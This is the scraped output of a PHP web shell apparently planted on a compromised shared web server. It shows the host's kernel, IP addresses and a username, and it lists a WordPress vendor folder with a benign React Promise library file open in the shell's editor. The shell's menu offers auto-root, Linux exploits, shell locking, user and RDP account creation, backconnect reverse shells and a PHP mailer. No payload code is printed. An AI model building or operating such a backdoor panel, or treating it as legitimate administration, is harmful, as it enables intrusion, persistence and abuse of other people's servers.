Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
react /
promise /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxr-xr-x
CancellablePromiseInterface.ph...
438
B
-rw-r--r--
CancellationQueue.php
1.11
KB
-rw-r--r--
Deferred.php
1.43
KB
-rw-r--r--
ExtendedPromiseInterface.php
3.37
KB
-rw-r--r--
FulfilledPromise.php
1.84
KB
-rw-r--r--
LazyPromise.php
1.7
KB
-rw-r--r--
Promise.php
8.64
KB
-rw-r--r--
PromiseInterface.php
1.74
KB
-rw-r--r--
PromisorInterface.php
195
B
-rw-r--r--
RejectedPromise.php
2.16
KB
-rw-r--r--
UnhandledRejectionException.ph...
613
B
-rw-r--r--
functions.php
13.96
KB
-rw-r--r--
functions_include.php
97
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CancellationQueue.php
<?php namespace React\Promise; class CancellationQueue { private $started = false; private $queue = []; public function __invoke() { if ($this->started) { return; } $this->started = true; $this->drain(); } public function enqueue($cancellable) { if (!\is_object($cancellable) || !\method_exists($cancellable, 'then') || !\method_exists($cancellable, 'cancel')) { return; } $length = \array_push($this->queue, $cancellable); if ($this->started && 1 === $length) { $this->drain(); } } private function drain() { for ($i = key($this->queue); isset($this->queue[$i]); $i++) { $cancellable = $this->queue[$i]; $exception = null; try { $cancellable->cancel(); } catch (\Throwable $exception) { } catch (\Exception $exception) { } unset($this->queue[$i]); if ($exception) { throw $exception; } } $this->queue = []; } }
Close